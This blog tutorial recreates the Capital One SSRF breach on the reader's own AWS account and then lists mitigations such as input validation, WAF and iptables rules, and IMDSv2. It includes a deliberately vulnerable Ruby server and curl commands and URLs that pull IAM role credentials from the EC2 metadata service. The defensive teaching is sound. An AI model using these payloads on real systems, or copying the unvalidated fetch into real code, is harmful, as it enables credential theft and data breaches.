DISCLOSURE: The intention of this blog is NOT to help others hack, but to make sure they can secure their applications built on top of AWS or some other Cloud. A few mitigations to fix the SSRF vulnerability and others have been mentioned towards the end of the blog.

Also, AWS made changes to the EC2 Instance Metadata Service on 19/Nov/2019 in response to this kind of attack. I have blogged about it here. I would recommend going through this article first and the other one as a follow-up.

Introduction

Capital One hosted their services on AWS and was hacked (1, 2, 3). Data was downloaded from AWS S3. The hack, carried out by an ex-AWS employee, exploited a feature in AWS together with a misconfiguration made by Capital One. The information about the hack was everywhere in the news, but it was all in bits and pieces. It took me some time to recreate the hack on my own AWS account. This blog is about the sequence of steps to recreate the same hack in your AWS account.

I came across the SSRF vulnerability recently, but it looks like it has been around for ages, and still the different organizations using the AWS Cloud didn't patch it. The hacker was able to get the data from 30 different organizations. I hope this documentation will help a few to fix the hole in some applications and also to design and build secure applications.

Here I am assuming that the readers are familiar with AWS concepts like EC2, Security Group, WAF and IAM, and that they have an account with AWS. The AWS free tier should be good enough to try the steps.

Steps to recreate the Capital One hack

Step 1: Create a Security Group. Open Port 80 for HTTP and Port 22 for SSH. Open them only for MyIP as the Source.

Step 2: Create an Ubuntu EC2 instance of t2.micro and log in via Putty. Attach the above Security Group to the Ubuntu EC2 instance.

Step 3: Create an IAM role (Role4EC2-S3RO) with the AmazonS3ReadOnlyAccess policy and attach the IAM role to the above Ubuntu EC2 instance. Use a policy with very limited privileges, like S3 read-only or something else behind which there is no critical data.

Step 4: Run the below curl command on the Ubuntu EC2 instance to get the IAM role credentials via the EC2 Metadata Service.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO
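The response to this command is a small JSON document holding temporary credentials for the role. As a minimal sketch (the sample values below are made-up placeholders, not real credentials, and `parse_role_credentials` is a helper name chosen for this illustration), it could be parsed in Ruby like this:

```ruby
require 'json'
require 'time'

# Placeholder response in the shape the metadata service returns for a role.
# Every value here is fake and for illustration only.
SAMPLE_RESPONSE = <<~BODY
  {
    "Code": "Success",
    "LastUpdated": "2019-08-01T10:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEKEYID",
    "SecretAccessKey": "exampleSecretAccessKey",
    "Token": "exampleSessionToken",
    "Expiration": "2019-08-01T16:00:00Z"
  }
BODY

# Pull out the three values needed to sign AWS requests, plus the expiry time.
def parse_role_credentials(body)
  data = JSON.parse(body)
  {
    access_key_id: data.fetch('AccessKeyId'),
    secret_access_key: data.fetch('SecretAccessKey'),
    session_token: data.fetch('Token'),
    expires_at: Time.iso8601(data.fetch('Expiration'))
  }
end

creds = parse_role_credentials(SAMPLE_RESPONSE)
puts "Key ID:  #{creds[:access_key_id]}"
puts "Expires: #{creds[:expires_at]}"
```

The credentials are temporary, so all three values (key ID, secret key and session token) are needed together, and they stop working after the expiration time.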

Step 5: Install Ruby and Sinatra on the Ubuntu EC2 instance. The last command takes a few minutes to execute.

sudo apt-get update

sudo apt-get install ruby

sudo gem install sinatra

Step 6: Create a server.rb file with the below content on the Ubuntu EC2 instance. This will create a webserver. The server takes a URL as input, opens it and sends the content behind the URL as the output to the browser. The input URL is never validated in the below code, so it is possible to reach an internal network URL as well, which is exactly how the hack worked.

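require 'sinatra'
require 'open-uri'

# Deliberately vulnerable: fetches whatever URL the caller supplies.
get '/' do
  # URI.open is needed on Ruby 3.0+, where a bare open() no longer accepts URLs.
  format 'RESPONSE: %s', URI.open(params[:url]).read
end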

Once started, the above program keeps running in the foreground and does not return to the prompt. So, another Putty session has to be opened to execute the later commands.

Step 7: Get the Private IP of the Ubuntu EC2 instance, replace 1.2.3.4 with it in the below command and execute the command on the Ubuntu EC2 instance. This will start the webserver using the above Ruby program.

sudo ruby server.rb -o 1.2.3.4 -p 80

Step 8: Run the below command on the Ubuntu EC2 instance. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. server.rb will call google.com and return the response.

curl http://5.6.7.8:80/\?url\=https://www.google.com/

Now, run the below command. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. Notice that the Access Keys of the role attached to the Ubuntu EC2 instance are displayed as the response to the command.

curl http://5.6.7.8:80/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 9: Open the below URL in a browser on your machine to get the Access Keys of the IAM role displayed in the browser. Make sure to replace 5.6.7.8 with the Public IP of the Ubuntu EC2 instance.

http://5.6.7.8:80?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO
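The URL above places one URL inside the query string of another without any encoding. That works here because the inner URL has no `&` or `#` characters, but in general the inner URL should be percent-encoded. A small sketch of building the same request URL in Ruby, where `build_request_url` is a hypothetical helper and 5.6.7.8 is the same placeholder IP as above:

```ruby
require 'uri'

# Hypothetical helper: builds the request URL for the test server,
# percent-encoding the inner URL so it travels as a single query value.
def build_request_url(server_ip, target_url, port: 80)
  URI::HTTP.build(
    host: server_ip,
    port: port,
    path: '/',
    query: URI.encode_www_form(url: target_url)
  ).to_s
end

inner = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO'
puts build_request_url('5.6.7.8', inner)
```

Sinatra decodes the query value again before it reaches `params[:url]`, so the server sees the same inner URL either way.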

This is how Capital One and other organizations got hacked via the SSRF vulnerability. Once the hacker has the Access Keys, it's all about using the AWS CLI or SDK to get the data from S3 or somewhere else, depending on the policy attached to the IAM role.

Many websites ask us to enter our LinkedIn profile URL or Twitter URL, then call that URL to get more information about us. The same feature can be exploited to invoke any other URL and get details from behind the firewall, if the security is not configured properly. In the above command a call is made to 169.254.169.254 (an internal network IP) to get the credentials via the EC2 Metadata Service.
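What server.rb never does is look at where the user-supplied URL points before fetching it. A minimal sketch of such a check in Ruby follows. The helper names and the list of blocked ranges are assumptions made for this illustration, not an exhaustive or authoritative list:

```ruby
require 'ipaddr'
require 'resolv'
require 'uri'

# Address ranges a URL-fetching server should normally refuse to contact.
# Illustrative assumption: loopback, private and link-local ranges only.
BLOCKED_NETWORKS = %w[
  0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16
  172.16.0.0/12 192.168.0.0/16 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

# Returns the addresses a host points to; IP literals are used as they are,
# host names are resolved through DNS.
def addresses_for(host)
  [IPAddr.new(host)]
rescue IPAddr::InvalidAddressError
  Resolv.getaddresses(host).map { |addr| IPAddr.new(addr) }
end

# Hypothetical check: true only for http(s) URLs whose host resolves
# exclusively to addresses outside the blocked ranges.
def safe_to_fetch?(raw_url)
  uri = URI.parse(raw_url.to_s)
  return false unless uri.is_a?(URI::HTTP)

  host = uri.hostname
  return false if host.nil? || host.empty?

  addresses = addresses_for(host)
  return false if addresses.empty?

  addresses.none? do |ip|
    # native turns IPv4-mapped IPv6 addresses back into plain IPv4.
    BLOCKED_NETWORKS.any? { |net| net.include?(ip.native) }
  end
rescue URI::InvalidURIError, IPAddr::Error
  false
end

puts safe_to_fetch?('http://169.254.169.254/latest/meta-data/')
```

A check like this would sit in front of the fetch in server.rb and reject the request when it returns false. It is only one layer: open-uri follows redirects, and DNS answers can change between the check and the fetch, so it should be combined with the other mitigations rather than relied on alone.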

Step 10: Make sure to terminate the EC2 instance and delete the IAM role.

Mitigations around the SSRF

Any one of the below steps would have stopped the Capital One hack or any other like it.

1. Review the application code for SSRF attacks and perform proper validation of the inputs.



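2. Add a WAF rule to detect the "169.254.169.254" string and block the request from reaching the EC2 instance, as shown in the diagram at the beginning of the blog.

3. Make changes on the Ubuntu EC2 instance to block the calls to 169.254.169.254. The rule below drops such calls from any process that is not running as root. Note that server.rb in Step 7 was started with sudo, so it would have to run as a non-root user for this rule to stop it.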

iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

4. Use services like AWS Macie to detect any anomalies in the data access pattern and take preventive action. There are many 3rd party services which, when integrated with S3, will identify an anomaly in the S3 access patterns and notify us. I haven't worked with such tools.

5. In the case of Capital One, I am not sure if the EC2 instance required AmazonS3ReadOnlyAccess, but it's always better to give any resource only the minimum privileges it requires.

6. AWS has made changes to the EC2 Instance Metadata Service to address this. I have blogged about them here.
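The change referred to in point 6 is version 2 of the Instance Metadata Service (IMDSv2). It requires a session token, obtained with a PUT request, to be sent as a header with every metadata read. An SSRF like the one in server.rb can only make a plain GET request without custom headers, so it cannot complete this exchange once the instance is configured to require tokens. A rough sketch of the two requests in Ruby; the helper names are mine, and `fetch_role_credentials` only does something useful when run on an EC2 instance:

```ruby
require 'net/http'

IMDS_HOST = '169.254.169.254'

# First request: ask for a session token valid for ttl_seconds.
def token_request(ttl_seconds = 21_600)
  req = Net::HTTP::Put.new('/latest/api/token')
  req['X-aws-ec2-metadata-token-ttl-seconds'] = ttl_seconds.to_s
  req
end

# Second request: read a metadata path, presenting the token in a header.
def metadata_request(path, token)
  req = Net::HTTP::Get.new(path)
  req['X-aws-ec2-metadata-token'] = token
  req
end

# Performs both requests in order and returns the credentials JSON.
# Not called here, because it needs the metadata service to be reachable.
def fetch_role_credentials(role_name)
  Net::HTTP.start(IMDS_HOST, 80, open_timeout: 2, read_timeout: 2) do |http|
    token = http.request(token_request).body
    path = "/latest/meta-data/iam/security-credentials/#{role_name}"
    http.request(metadata_request(path, token)).body
  end
end
```

On an instance with the role from Step 3 attached, `fetch_role_credentials('Role4EC2-S3RO')` would be the token-based equivalent of the curl command in Step 4.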

Conclusion

AWS claims that their systems were secure and that the hack had to do with the misconfiguration of the AWS WAF by Capital One, along with a few other things like giving excessive permissions to EC2 via the IAM role. I agree with that, but AWS should also not have left the EC2 metadata service wide open to anyone with access to the EC2 instance. I am not sure how AWS would fix it, as any changes to the EC2 metadata interface would break the existing applications using it. The letter from AWS to US Senator Wyden on this incident is an interesting read.

Whether we blame AWS or Capital One, in the end it is the customers of the 30 different organizations who have to suffer.

References

Retrieving the Role Access Keys via EC2 Metadata

EC2s most dangerous feature

What is Sinatra?

What is SSRF and code for the same

On Capital One from Krebs (1, 2)

On Capital One From Evan (1)

Technical analysis of the hack by CloudSploit

WAF FAQ
